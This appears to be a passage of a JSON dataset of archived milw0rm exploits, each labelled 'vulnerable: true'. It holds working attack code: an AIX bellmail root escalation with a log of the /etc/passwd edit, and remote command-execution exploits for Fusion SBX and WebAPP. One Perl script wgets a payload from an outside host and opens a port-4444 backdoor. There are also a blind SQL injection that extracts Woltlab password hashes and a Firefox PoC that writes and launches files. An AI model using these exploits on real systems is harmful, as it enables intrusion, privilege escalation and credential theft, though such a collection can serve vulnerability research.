x_bellmail.sh\n\n#!/bin/sh\n\n#File:x_bellmail.sh\n\n#The assistant of x_aix5_bellmail.pl\n\n#Author : watercloud@xfocus.org\n\n#Date   :2004-6-6\n\n#\n\n\n\nX_BELL_PL=\"./x_aix5_bellmail.pl\"\n\nAIM=$1\n\n\n\nif [ $# ne 1 ] ;then\n\n        echo \"Need a aim file name as argv.\"\n\n        exit 1;\n\nfi\n\n\n\nif [ ! -e \"$1\" ];then\n\n        echo \"$1 not exist!\"\n\n        exit 1\n\nfi\n\nif [ ! -x \"$X_BELL_PL\" ];then\n\n        echo \"can not exec $X_BELL_PL\"\n\n        exit 1\n\nfi\n\n\n\nret=`ls -l $AIM`\n\necho $ret; echo\n\nfuser=`echo $ret |awk '{print $3}'`\n\nwhile [ \"$fuser\" != \"$LOGIN\" ]\n\ndo\n\n        $X_BELL_PL $AIM\n\n        ret=`ls -l $AIM`\n\n        echo $ret;echo\n\n        fuser=`echo $ret |awk '{print $3}'`\n\ndone\n\necho $ret; echo\n\n#EOF\n\n\n\n\n\n\n\n\n\n-bash-2.05b$ id\n\nuid=201(cloud) gid=1(staff)\n\n-bash-2.05b$\n\n-bash-2.05b$ oslevel\n\n5.1.0.0\n\n-bash-2.05b$ oslevel -r\n\n5100-01\n\n-bash-2.05b$ ls -l /usr/bin/bellmail\n\n-r-sr-sr-x   1 root     mail          30208 Aug 09 2003  /usr/bin/bellmail\n\n-bash-2.05b$ ls -l /etc/passwd\n\n-rw-r--r--   1 root     security        570 Jun 03 22:59 /etc/passwd\n\n-bash-2.05b$ cp /etc/passwd /tmp/\n\n\n\n\n\n-bash-2.05b$ ./x_bellmail.sh /etc/passwd\n\n./x_bellmail.sh[11]: ne: 0403-012 A test command parameter is not valid.\n\n-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd\n\n\n\nBefore: -rw-r--r--   1 root     security        570 Jun 03 22:59 /etc/passwd\n\nFrom cloud Sun Jun  6 08:49:30 2004\n\nabc\n\n\n\n? w\n\nFrom cloud Sun Jun  6 08:25:20 2004\n\nabc\n\n\n\n? q\n\n-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd\n\n\n\nBefore: -rw-r--r--   1 root     security        570 Jun 03 22:59 /etc/passwd\n\nFrom cloud Sun Jun  6 08:49:35 2004\n\nabc\n\n\n\n? w\n\nFrom cloud Sun Jun  6 08:25:20 2004\n\nabc\n\n\n\n? q\n\n-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd\n\n\n\nBefore: -rw-r--r--   1 root     security        570 Jun 03 22:59 /etc/passwd\n\nFrom cloud Sun Jun  6 08:49:40 2004\n\nabc\n\n\n\n? w\n\nFrom cloud Sun Jun  6 08:25:20 2004\n\nabc\n\n\n\n? q\n\n-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd\n\n\n\nBefore: -rw-r--r--   1 root     security        570 Jun 03 22:59 /etc/passwd\n\nFrom cloud Sun Jun  6 08:49:43 2004\n\nabc\n\n\n\n? w\n\nFrom cloud Sun Jun  6 08:25:20 2004\n\nabc\n\n\n\n? q\n\n-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd\n\n\n\nBefore: -rw-r--r--   1 root     security        570 Jun 03 22:59 /etc/passwd\n\nw\n\nFrom cloud Sun Jun  6 08:49:48 2004\n\nabc\n\n\n\n? From cloud Sun Jun  6 08:25:20 2004\n\nabc\n\n\n\n? w\n\nbellmail: cannot append to /home/cloud/mbox\n\n? w\n\nbellmail: cannot append to /home/cloud/mbox\n\n? q\n\n-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd\n\n\n\nBefore: -rw-r--r--   1 root     security        570 Jun 03 22:59 /etc/passwd\n\nFrom cloud Sun Jun  6 08:49:56 2004\n\nabc\n\n\n\n? w\n\nFrom cloud Sun Jun  6 08:25:20 2004\n\nabc\n\n\n\n? q\n\n-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd\n\n\n\nBefore: -rw-r--r--   1 root     security        570 Jun 03 22:59 /etc/passwd\n\nFrom cloud Sun Jun  6 08:50:01 2004\n\nabc\n\n\n\n? w\n\nFrom cloud Sun Jun  6 08:25:20 2004\n\nabc\n\n\n\n? q\n\n-rw-r--r-- 1 cloud staff 570 Jun 03 22:59 /etc/passwd\n\n\n\n-rw-r--r-- 1 cloud staff 570 Jun 03 22:59 /etc/passwd\n\n\n\n\n\n\n\n\n\n\n\n\n\n-bash-2.05b$ cat /etc/passwd\n\nroot:!:0:0::/:/usr/bin/ksh\n\ndaemon:!:1:1::/etc:\n\nbin:!:2:2::/bin:\n\nsys:!:3:3::/usr/sys:\n\nadm:!:4:4::/var/adm:\n\nuucp:!:5:5::/usr/lib/uucp:\n\nguest:!:100:100::/home/guest:\n\nnobody:!:4294967294:4294967294::/:\n\nlpd:!:9:4294967294::/:\n\nlp:*:11:11::/var/spool/lp:/bin/false\n\ninvscout:*:200:1::/var/adm/invscout:/usr/bin/ksh\n\nnuucp:*:6:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico\n\nsnapp:*:177:1:snapp login user:/usr/sbin/snapp:/usr/sbin/snappd\n\nimnadm:*:188:188::/home/imnadm:/usr/bin/ksh\n\ncloud:!:201:1::/home/cloud:/usr/local/bin/bash\n\n\n\n\n\n\n\n-bash-2.05b$ cat /tmp/passwd |sed 's/cloud:!:201:/cloud:!:0:/' >/etc/passwd\n\n\n\n\n\n-bash-2.05b$ su cloud\n\ncloud's Password:\n\n3004-502 Cannot get \"LOGNAME\" variable.\n\n-bash-2.05b$ id\n\nuid=201 gid=1(staff)\n\n-bash-2.05b$ ls -l /etc/passwd\n\n-rw-r--r--   1 201      staff           568 Jun 06 08:56 /etc/passwd\n\n-bash-2.05b$ echo 'test:!:201:1::/home/cloud:/usr/local/bin/bash'  >> /etc/passwd\n\n-bash-2.05b$ cat /etc/passwd\n\nroot:!:0:0::/:/usr/bin/ksh\n\ndaemon:!:1:1::/etc:\n\nbin:!:2:2::/bin:\n\nsys:!:3:3::/usr/sys:\n\nadm:!:4:4::/var/adm:\n\nuucp:!:5:5::/usr/lib/uucp:\n\nguest:!:100:100::/home/guest:\n\nnobody:!:4294967294:4294967294::/:\n\nlpd:!:9:4294967294::/:\n\nlp:*:11:11::/var/spool/lp:/bin/false\n\ninvscout:*:200:1::/var/adm/invscout:/usr/bin/ksh\n\nnuucp:*:6:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico\n\nsnapp:*:177:1:snapp login user:/usr/sbin/snapp:/usr/sbin/snappd\n\nimnadm:*:188:188::/home/imnadm:/usr/bin/ksh\n\ncloud:!:0:1::/home/cloud:/usr/local/bin/bash\n\ntest:!:201:1::/home/cloud:/usr/local/bin/bash\n\n\n\n\n\n-bash-2.05b$ su cloud\n\ncloud's Password:\n\nbash-2.05b# id\n\nuid=0(root) gid=1(staff)\n\nbash-2.05b# ls -l /etc/passwd\n\n-rw-r--r--   1 test     staff           614 Jun 06 08:58 /etc/passwd\n\nbash-2.05b# cp /tmp/passwd /etc/passwd\n\nbash-2.05b# chown root /tmp/passwd\n\nbash-2.05b# ls -l /tmp/passwd\n\n-rw-r--r--   1 root     staff           570 Jun 06 08:48 /tmp/passwd\n\nbash-2.05b# id\n\nuid=0(root) gid=1(staff)\n\nbash-2.05b#\n\nbash-2.05b# rm /tmp/.bel*\n\nbash-2.05b# rm /tmp/passwd\n\nbash-2.05b#\n\n\n\n\n\n# milw0rm.com [2005-05-19]",
25        "vulnerable": true
26    },
27    {
28        "exploit_id": 1003,
29        "content": "/*****************************************************\n\n*                                                    *\n\n*  [Fusion SBX <= 1.2] exploit                       *\n\n*                                                    *\n\n*  sileFSBXxpl                                       *\n\n*                                                    *\n\n*  This exploit use vulnerability found into         *\n\n*  Fusion SBX and create new variable and call it    *\n\n*  with a malicious function (stored in config.php). *\n\n*  This exploit utilize injection of three diverse   *\n\n*  procedures for execution of arbitrary code on     *\n\n*  vulnerable machine with httpd privileges.         *\n\n*                                                    *\n\n*  References: www.securityfocus.org/bid/13575       * \n\n*                                                    *\n\n*  coded by: Silentium of Anacron Group Italy        *\n\n*      date: 10/05/2005                              *\n\n*    e-mail: anacrongroupitaly[at]autistici[dot]org  *\n\n*   my_home: www.autistici.org/anacron-group-italy   *\n\n*                                                    *\n\n*  this tool is developed under GPL license          *\n\n*  no(c) .:. copyleft                                *\n\n*                                                    *\n\n*****************************************************/\n\n\n\n#include <stdio.h>\n\n#include <stdlib.h>\n\n#include <sys/types.h>\n\n#include <sys/socket.h>\n\n#include <netinet/in.h>\n\n#include <netdb.h>\n\n\n\n#define PORT 80\t\t// port of web server \n\n\n\nvoid info(void);\n\nvoid banner(void);\n\nvoid sendxpl(FILE *out, char *argv[], int type);\n\nvoid errsock(void);\n\nvoid errgeth(void);\n\nvoid errconn(char *argv[]);\n\n\n\n\n\nint main(int argc, char *argv[]){\n\n\n\nFILE *out;\n\nint sock, sockconn, type;\n\nstruct sockaddr_in addr;\n\nstruct hostent *hp;\n\n\n\nif(argc!=4)\n\n   info();\n\n\n\ntype = atoi(argv[3]);\n\n\n\nif(type < 1 || type > 3)\n\n   info();\n\n\n\nbanner();\n\n   \n\nif((sock = socket(AF_INET,SOCK_STREAM,0)) < 0)\n\n   errsock();\n\n   \n\n   printf(\"[*] Creating socket\t\t[OK]\\n\");\n\n\n\nif((hp = gethostbyname(argv[1])) == NULL)\n\n   errgeth();\n\n   \n\n   printf(\"[*] Resolving victim host\t[OK]\\n\");\n\n   \n\nmemset(&addr,0,sizeof(addr));\n\nmemcpy((char *)&addr.sin_addr,hp->h_addr,hp->h_length);\n\naddr.sin_family = AF_INET;\n\naddr.sin_port = htons(PORT);\n\n   \n\nsockconn = connect(sock,(struct sockaddr *)&addr,sizeof(addr));\n\nif(sockconn < 0)\n\n   errconn(argv);\n\n   \n\n   printf(\"[*] Connecting at victim host   [OK]\\n\");\n\n   \n\nout = fdopen(sock,\"a\");\n\nsetbuf(out,NULL);\n\n\n\nsendxpl(out,argv,type);\n\n\n\n   printf(\"[*] Now test at execute code on\\n\\n\" \n\n          \"[1] %s%sindex.php?sile=id\\n\"\n\n          \"[2] %s%sadmin/index.php?sile=id\\n\\n\",argv[1],argv[2],argv[1],argv[2]);\n\n\n\nshutdown(sock,2);\n\nclose(sock);\n\n\n\nreturn 0;\n\n\n\n}\n\n\n\n\n\nvoid info(void){\n\n\n\nsystem(\"clear\");\n\nprintf(\"\\n   #########################################\\n\"\n\n       \"   #             sileFSBXxpl               #\\n\"\n\n       \"   #  ###################################  #\\n\"\n\n       \"   #       Fusion SBX <= 1.2 exploit       #\\n\"\n\n       \"   #       Remote Command Execution        #\\n\"\n\n       \"   #          coded by Silentium           #\\n\"            \n\n       \"   #        [ Anacron Group Italy ]        #\\n\"\n\n       \"   #  ###################################  #\\n\"\n\n       \"   # www.autistici.org/anacron-group-italy #\\n\"\n\n       \"   #########################################\\n\\n\"\n\n       \" [Usage]\\n\\n\" \n\n       \"  sileFSBXxpl <victim> <path_sbx> <type>\\n\\n\"\n\n       \"        [Type]\\n\\n\"\n\n       \"              1) injection of system()\\n\"\n\n       \"              2) injection of exec()\\n\"\n\n       \"              3) injection of passthru()\\n\\n\"\n\n       \" [Example]\\n\\n\"\n\n       \"  sileFSBXxpl www.victim.com /sbx/ 1\\n\\n\"); \n\nexit(1);\n\n\n\n}\n\n\n\n\n\nvoid banner(void){\n\n\n\nsystem(\"clear\");\n\nprintf(\"[-] sileFSBXxpl\\n\"\n\n       \"    ============\\n\"\n\n       \"[-] Fusion SBX <= 1.2 exploit\\n\"\n\n       \"[-] coded by Silentium - Anacron Group Italy\\n\"\n\n       \"[-] www.autistici.org/anacron-group-italy\\n\\n\");\n\n       \n\n}\n\n       \n\n\n\nvoid sendxpl(FILE *out, char *argv[], int type){\n\n\n\nchar *call;\n\nint size = 245;\n\n\n\nif(type == 1)\n\n   call = \"system\";\n\nelse if(type == 2)\n\n   call = \"exec\";\n\nelse if(type == 3)\n\n   call = \"passthru\";\n\n\n\nsize+=strlen(call);\n\n       \n\nfprintf(out,\"POST %sadmin/?settings HTTP/1.0\\n\"\n\n            \"Connection: Keep-Alive\\n\"\n\n            \"Pragma: no-cache\\n\"\n\n            \"Cache-control: no-cache\\n\"\n\n            \"Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\\n\"\n\n            \"Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\\n\"\n\n            \"Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\\n\"\n\n            \"Accept-Language: en\\n\"\n\n            \"Host: %s\\n\"\n\n            \"Content-Type: application/x-www-form-urlencoded\\n\"\n\n            \"Content-Length: %d\\n\\n\"\n\n            \"set2=basic&admin_set2=standard&lang2=english&plimit2=10&noname2=Guest&\"\n\n            \"refresh2=120&maxname2=30%%3B%%40%s%%28%%24_GET%%5Bsile%%5D%%29&maxmess\"\n\n            \"2=120&maxlink2=120&wordbanning2=1&maxword2=20&wrapstat2=1&postorder2=1\"\n\n            \"&setsubmit=Commit+Changes&is_logged=1\\n\\n\",argv[2],argv[1],size,call);\n\n                                  \n\n            printf(\"[*] Sending exploit\t\t[OK]\\n\\n\");\n\n\n\n}\n\n            \n\n                 \n\nvoid errsock(void){\n\n\n\nsystem(\"clear\");\n\nprintf(\"[x] Creating socket\t[FAILED]\\n\\n\");\n\nexit(1);\n\n\n\n}\n\n\n\n\n\nvoid errgeth(void){\n\n\n\nprintf(\"[x] Resolving victim host\t[FAILED]\\n\\n\");\n\nexit(1);\n\n\n\n}\n\n\n\n\n\nvoid errconn(char *argv[]){\n\n\n\nprintf(\"[x] Connecting at victim host\t[FAILED]\\n\\n\",argv[1]);\n\nexit(1);\n\n\n\n}\n\n\n\n// milw0rm.com [2005-05-20]",
30        "vulnerable": true
31    },
32    {
33        "exploit_id": 1004,
34        "content": "<?php\n\n\n\n########################################################\n\n#                                                      #\n\n#  WebAPP v0.9.9.2.1 Remote Command Execution Exploit  #\n\n#                 [Code by Nikyt0x]                    #\n\n#                 nikyt0x@gmail.com                    #\n\n#                                                      #\n\n#    Advisory: www.defacers.com.mx/advisories/3.txt    #                                               #\n\n#                                                      #\n\n#    Saludos:                                          #\n\n#                                                      #\n\n#    Soulblack Staff, Status-x, NeosecurityTeam,       #\n\n#    KingMetal, Trespasser...                          #\n\n#                                                      #\n\n########################################################\n\n#                                                      #\n\n# sbwebapp.php www.host.com /dirto/apage.cgi \"command\" #\n\n#                                                      #\n\n# Linux dprhensim19.doteasy.com 2.4.22-1.2199.nptl     #\n\n# #1 Wed Aug 4 12:21:48 EDT 2004 i686 i686 i386        #\n\n# GNU/Linux                                            #\n\n# uid=557(scapip) gid=558(scapip) groups=558(scapip)   #\n\n#                                                      #\n\n#                                                      #\n\n#                                                      #\n\n########################################################\n\n\n\n\n\nif ($argc != 4) {\n\n\n\n   echo \"\\n              =====================================\\n\";\n\n   echo \"               WebAPP v0.9.9.2.1 apage.cgi Exploit\\n\";\n\n   echo \"              =====================================\\n\";\n\n   echo \"                    Nikyt0x - SoulBlack Team\\n\\n\";\n\n   echo \"\\nUsage:\\n\\n\";\n\n   echo \" $argv[0] www.host.com /apagedir/apage.cgi \\\"command\\\"\\n\";\n\n   exit(0);\n\n   }\n\n\n\nif(!ereg('apage.cgi',$argv[2])) {\n\n   echo \"URL to apage.cgi Incorrect.\";\n\n   exit(0);\n\n   }\n\n\n\n   echo \"\\n              =====================================\\n\";\n\n   echo \"               WebAPP v0.9.9.2.1 apage.cgi Exploit\\n\";\n\n   echo \"              =====================================\\n\";\n\n   echo \"                    Nikyt0x - SoulBlack Team\\n\\n\";\n\n\n\n\n\n\n\n\n\n$s0ck3t = fsockopen($argv[1], 80);\n\nif (!$s0ck3t) {\n\n   echo \"[-] Socket\\n\";\n\n   exit(0);\n\n   \n\n} else {\n\n   $ex3cutar = str_replace(\" \", \"%20\", $argv[3]);\n\n   $petici0n = \"GET $argv[2]?f=expofranquicias.htm|echo%20c0mand0s;$ex3cutar;echo%20final1zar| HTTP/1.1\\r\\n\";\n\n   $petici0n .= \"Host: $argv[1]\\r\\n\";\n\n   $petici0n .= \"Connection: Close\\r\\n\\r\\n\";\n\n   \n\n   echo \"[+] Socket\\n\";\n\n   \n\n   if(!fwrite($s0ck3t, $petici0n))\n\n   {\n\n   echo \"[-] Sending Exploit\\n\";\n\n   exit(0);\n\n   }\n\n   echo \"[+] Sending Exploit\\n\";\n\n   while (!feof($s0ck3t)) {\n\n       $g3tdata = fgets($s0ck3t, 1024);\n\n\t   if (eregi('c0mand0s',$g3tdata))\n\n\t   {\n\n\t   $aceptar = 1;\n\n\t   }\n\n\t   if (eregi('final1zar',$g3tdata))\n\n\t   {\n\n\t   $aceptar = 0;\n\n\t   }\n\n\t   while ($aceptar == 1)\n\n\t   {\n\n\t  \t   if(eregi('c0mand0s',$g3tdata))\n\n\t\t   {\n\n\t\t    $g3tdata = str_replace('c0mand0s','', $g3tdata);\n\n\t\t   echo \"[+] Command:\\n\";\n\n\t\t   }\n\n\t\t   $g3tdata = str_replace('c0mand0s','', $g3tdata);\n\n\t\t   echo $g3tdata;\n\n\t\t   break;\n\n\t   }\n\n\t   \n\n   }\n\n   fclose($s0ck3t);\n\n}\n\n?> \n\n\n\n# milw0rm.com [2005-05-20]",
35        "vulnerable": true
36    },
37    {
38        "exploit_id": 1005,
39        "content": "!/usr/bin/perl\n\n#################################################################\n\n#                         T r a p - S e t   U n d e r G r o u n D   H a c k i n g   T e a m                               #\n\n#################################################################\n\n# Remote C0mmand Executing Expl0it - For WebAPP CGI\n\n#\n\n#Exploit By :  A l p h a _ P r o g r a m m e r ( Sirus-v );\n\n#E-Mail : Alpha_Programmer@Yahoo.com\n\n#            Trapset_Sec@Yahoo.Ca\n\n#This xpl Open a Backdoor in 4444 Port with Nobody Access !!! All Of The *NIX OS that Have UnPatch\n\n#apage.cgi is Vulnerable in this M0ment !!\n\n#\n\n#################################################################\n\n#  Gr33tz To ==>  AlphaST.Com , Crouz.Com  , Simorgh-ev.Com  And  MH_P0rtal , Oil_Krachack     #\n\n#################################################################\n\nuse IO::Socket;\n\n\n\nif (@ARGV < 2)\n\n{\n\n print \"\\n==============================================\\n\";\n\n print \" \\n    WebAPP CGI Exploit By Alpha_Programmer \\n\\n\";\n\n print \"      Trap-Set Underground Hacking Team      \\n\\n\";\n\n print \"            Usage: <T4rg3t> <Dir>      \\n\\n\";\n\n print \"==============================================\\n\\n\";\n\n print \"Examples:\\n\\n\";\n\n print \"    WebApp.pl www.Host.com /cgi-bin/ \\n\";\n\n exit();\n\n}\n\n\n\n\n\n$serv = $ARGV[0];\n\n$serv =~ s/http:\\/\\///ge;\n\n\n\n$dir = $ARGV[1];\n\n\n\n$cmde = \"cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt\";\n\n\n\n$cmde =~ s/ /\"\\$IFS\"/ge;\n\n\n\n$req  = \"GET http://$serv\";\n\n$req .= \"$dir\";\n\n$req .= \"apage.cgi?f=file.htm.|echo\\$IFS\\\"_N_\\\";$cmde;echo\\$IFS\\\"_T_\\\"| HTTP/1.0\\n\\n\";\n\n\n\n$sock = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$serv\", PeerPort=>80) or die \" (-) - C4n't C0nn3ct To The S3rver\\n\";\n\n\n\nprint $sock $req;\n\nprint \"\\nPlease Wait ...\\n\\n\";\n\nsleep(3000);\n\nclose($sock);\n\n\n\n$sock2 = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$serv\", PeerPort=>80) or die \" (-) - C4n't C0nn3ct To The S3rver\\n\";\n\n\n\n\n\n$cmde2 = \"cd /tmp;cp alpha.txt alpha.pl;chmod 777 sirus.pl;perl sirus.pl\";\n\n\n\n$cmde2 =~ s/ /\"\\$IFS\"/ge;\n\n\n\n$req2  = \"GET http://$serv\";\n\n$req2 .= \"$dir\";\n\n$req2 .= \"apage.cgi?f=file.htm.|echo\\$IFS\\\"_N_\\\";$cmde2;echo\\$IFS\\\"_T_\\\"| HTTP/1.0\\n\\n\";\n\n\n\nprint $sock2 $req2;\n\nprint \"\\n\\n$$$   OK -- Now Try: Nc -v www.host.com 4444   $$$\\n\";\n\nprint \"$$  if This Port was Close , This mean is That , You Hav'nt Permission to Write in /TMP  $$\\n\";\n\n\n\n### EOF ###\n\n\n\n\n\n# milw0rm.com [2005-05-20]",
40        "vulnerable": true
41    },
42    {
43        "exploit_id": 1006,
44        "content": "#!/usr/bin/perl\n\n\n\nuse strict;\n\nuse IO::Socket::INET;\n\n\n\n\n\n$| = print \"\n\nWoltlab Burning Board <= 2.3.1 Exploit\n\nVulnerability discovered by GulfTech Security Research\n\nVisit www.security-project.org\n\nExploit by deluxe89\n\n----------\n\n\";\n\n\n\n\n\n\n\nmy $host = 'www.security-project.org';\n\nmy $path = '/wbb2/'; # path to the board\n\nmy $userid = 1; # the password hash will be from the user with this id\n\nmy $username = 'deluxe89'; # any username from the board\n\nmy $proxy = ''; # proxy, you can leave this empty\n\nmy $error = 'E-Mail-Adresse ist unzul&auml;ssig'; # use 'email address entered is already ta' for english boards\n\n\n\n\n\n# proxy handling\n\nmy ($addr, $port) = ($proxy ne '') ? split(/:/, $proxy) : ($host, 80);\n\nif($proxy ne '')\n\n{\n\n       print \"[~] Using a proxy\\n\";\n\n}\n\nelse\n\n{\n\n       print \"[~] You're using NO proxy!\\n\";\n\n       sleep(1);\n\n}\n\n\n\n\n\n\n\n\n\n\n\n#\n\n# Get the hash\n\n#\n\n\n\nprint \"[~] Getting the hash. Please wait some minutes..\\n[+] Hash: \";\n\n\n\n\n\nmy $hash = '';\n\nfor(my $i=1;$i<33;$i++)\n\n{\n\n       my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('[-] Could not connect to server');\n\n\n\n       if(&test($i, 96)) # buchstabe\n\n       {\n\n               for(my $c=97;$c<103;$c++)\n\n               {\n\n                       if(&test($i, $c, 1))\n\n                       {\n\n                               print pack('c', $c);\n\n                               last;\n\n                       }\n\n               }\n\n       }\n\n       else # zahl\n\n       {\n\n               #print \"0-4\\n\";\n\n               for(my $c=48;$c<58;$c++)\n\n               {\n\n                       if(&test($i, $c, 1))\n\n                       {\n\n                               print pack('c', $c);\n\n                               last;\n\n                       }\n\n               }\n\n       }\n\n}\n\nprint \"\\n\";\n\n\n\n\n\nsub test\n\n{\n\n       my ($i, $num, $g) = @_;\n\n\n\n       my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('Could not connect to server');\n\n       my $value = \"sre4sdffr\\@4g54asd5.org' OR (userid=$userid AND ascii(substring(password,$i,1))\";\n\n       $value .= ($g) ? '=' : '>';\n\n       $value .= \"$num)/*\";\n\n       my $data = \"r_username=$username&r_email=$value&r_password=aaaaaaaa&r_confirmpassword=aaaaaaaa&r_homepage=&r_icq=&r_aim=&r_yim=&r_msn=&r_day=0&r_month=0&r_year=&r_gender=0&r_signature=&r_usertext=&field%5B1%5D=&field%5B2%5D=&field%5B3%5D=&r_invisible=0&r_usecookies=1&r_admincanemail=1&r_showemail=1&r_usercanemail=1&r_emailnotify=0&r_notificationperpm=0&r_receivepm=1&r_emailonpm=0&r_pmpopup=0&r_showsignatures=1&r_showavatars=1&r_showimages=1&r_daysprune=0&r_umaxposts=0&r_threadview=0&r_dateformat=d.m.Y&r_timeformat=H%3Ai&r_startweek=1&r_timezoneoffset=1&r_usewysiwyg=0&r_styleid=0&r_langid=0&send=send&sid=&disclaimer=viewed\";\n\n\n\n       print $sock \"POST http://$host${path}register.php HTTP/1.1\\r\\nHost: $host\\r\\nConnection: Close\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\nContent-Length: \".length($data).\"\\r\\n\\r\\n$data\\r\\n\";\n\n\n\n\n\n       while(<$sock>)\n\n       {\n\n               if($_ =~ m/$error/) { return 1; }\n\n       }\n\n       return 0;\n\n}\n\n\n\n# milw0rm.com [2005-05-20]",
45        "vulnerable": true
46    },
47    {
48        "exploit_id": 1007,
49        "content": "<html>\n\n<head>\n\n<title>Firelinking 2 - Proof-of-Concept by mikx</title>\n\n\n\n<-- This PoC is cross platform : On Windows this example creates the file -->\n\n<-- c:\\booom.bat and launches it (opens a dos box with a dir command). On -->\n\n<-- Linux (tested Fedora Core) and MacOSX the example creates the file -->\n\n<-- ~/booom.txt or /booom.txt. Depending on caching the the script might -->\n\n<-- run twice in some cases (this will create an additional booom-1.txt). -->\n\n\n\n<link rel=\"SHORTCUT ICON\" href=\"favicon.ico\"> \n\n<script language=\"JavaScript\" type=\"text/javascript\">\n\nvar pf = navigator.platform.toLowerCase();\n\nif (pf.indexOf(\"win\") != -1) {\n\nvar os = \"win\";\n\n} else if (pf.indexOf(\"mac\") != -1) {\n\nvar os = \"mac\";\n\n} else {\n\nvar os = \"linux\"\n\n}\n\nfunction runDemo() {\n\n// this is an ugly caching workaround\n\ndocument.getElementById('outhtml').innerHTML = \"\";\n\ndocument.getElementById('outhtml').innerHTML += document.getElementById('clearhtml').value\n\ndocument.getElementById('outhtml').innerHTML += document.getElementById('clearhtml').value\n\ndocument.getElementById('outhtml').innerHTML += document.getElementById('clearhtml').value\n\nwindow.setTimeout(\"document.getElementById('outhtml').innerHTML += \n\ndocument.getElementById('linkhtml_\"+os+\"').value\",300);\n\n} \n\n</script>\n\n</head>\n\n<body>\n\n<div style=\"font-family:Verdana;font-size:11px;\">\n\n\n\n<div style=\"font-family:Verdana;font-size:15px;font-weight:bold;\">Firelinking 2 - Proof-of-Concept</div>\n\n<br><br>\n\n<div style=\"width:600px\">\n\n<div id=\"outhtml\" style=\"display:none\"></div>\n\n\n\n<textarea id=\"clearhtml\" style=\"display:none\">\n\n<link rel=\"SHORTCUT ICON\" href=\"favicon.ico\">\n\n&lt;/textarea&gt;\n\n\n\n<textarea id=\"linkhtml_win\" style=\"display:none\">\n\n<link rel=\"SHORTCUT ICON\" href=\"view-source:javascript:delayedOpenWindow('\n\njavascript:netscape.security.PrivilegeManager.enablePrivilege(\\'UniversalXPConnect\\');\n\nfile=Components.classes[\\'@mozilla.org/file/local;1\\'].createInstance(Components.interfaces.\n\nnsILocalFile);file.initWithPath(\\'c:\\\\\\\\booom.bat\\');file.createUnique(Components.interfaces.\n\nnsIFile.NORMAL_FILE_TYPE,420);outputStream=Components.classes[\\'@mozilla.org/network/\n\nfile-output-stream;1\\'].createInstance(Components.interfaces.nsIFileOutputStream);\n\noutputStream.init(file,0x04|0x08|0x20,420,0);output=\\'@ECHO OFF\\\\n:BEGIN\\\\nCLS\\\\nDIR\\\\n\n\nPAUSE\\\\n:END\\';outputStream.write(output,output.length);outputStream.close();file.launch();','','')\">\n\n&lt;/textarea&gt;\n\n\n\n<textarea id=\"linkhtml_mac\" style=\"display:none\">\n\n<link rel=\"SHORTCUT ICON\" href=\"view-source:javascript:delayedOpenWindow('javascript:\n\nnetscape.security.PrivilegeManager.enablePrivilege(\\'UniversalXPConnect\\');file=Components.\n\nclasses[\\'@mozilla.org/file/local;1\\'].createInstance(Components.interfaces.nsILocalFile);\n\nfile.initWithPath(\\'/booom.txt\\');file.createUnique(Components.interfaces.nsIFile.\n\nNORMAL_FILE_TYPE,420);outputStream=Components.classes[\\'@mozilla.org/network/\n\nfile-output-stream;1\\'].createInstance(Components.interfaces.nsIFileOutputStream);\n\noutputStream.init(file,0x04|0x08|0x20,420,0);output=\\'booom!\\';outputStream.write\n\n(output,output.length);outputStream.close();','','')\">\n\n&lt;/textarea&gt;\n\n\n\n<textarea id=\"linkhtml_linux\" style=\"display:none\">\n\n<link rel=\"SHORTCUT ICON\" href=\"view-source:javascript:delayedOpenWindow('javascript:\n\nnetscape.security.PrivilegeManager.enablePrivilege(\\'UniversalXPConnect\\');file=Components.\n\nclasses[\\'@mozilla.org/file/local;1\\'].createInstance(Components.interfaces.nsILocalFile);file.\n\ninitWithPath(\\'~/booom.txt\\');file.createUnique(Components.interfaces.nsIFile.\n\nNORMAL_FILE_TYPE,420);outputStream=Components.classes[\\'@mozilla.org/network/\n\nfile-output-stream;1\\'].createInstance(Components.interfaces.nsIFileOutputStream);\n\noutputStream.init(file,0x04|0x08|0x20,420,0);output=\\'booom!\\';outputStream.write\n\n(output,output.length);outputStream.close();','','')\">\n\n&lt;/textarea&gt;\n\n<br><br>\n\n<a href=\"#\" onclick=\"runDemo();runDemo();\">Run exploit</a>\n\n</div>\n\n</body>\n\n</html>\n\n\n\n# milw0rm.com [2005-05-21]",
50        "vulnerable": true
51    },
52    {
53        "exploit_id": 1008,
54        "content": "/*\n\n* TCP does not adequately validate segments before updating timestamp value\n\n* http://www.kb.cert.org/vuls/id/637934\n\n*\n\n* RFC-1323 (TCP Extensions for High Performance)\n\n*\n\n* 4.2.1 defines how the PAWS algorithm should drop packets with invalid\n\n* timestamp options:\n\n* \n\n* R1) If there is a Timestamps option in the arriving segment\n\n* and SEG.TSval < TS.Recent and if TS.Recent is valid (see\n\n* later discussion), then treat the arriving segment as not\n\n* acceptable:\n\n*\n\n* Send an acknowledgement in reply as specified in\n\n* RFC-793 page 69 and drop the segment.\n\n*\n\n* 3.4 defines what timestamp options to accept:\n\n*\n\n* (2) If Last.ACK.sent falls within the range of sequence numbers\n\n* of an incoming segment:\n\n*\n\n* SEG.SEQ <= Last.ACK.sent < SEG.SEQ + SEG.LEN\n\n*\n\n* then the TSval from the segment is copied to TS.Recent;\n\n* otherwise, the TSval is ignored.\n\n*\n\n* http://community.roxen.com/developers/idocs/drafts/\n\n* draft-jacobson-tsvwg-1323bis-00.html\n\n*\n\n* 3.4 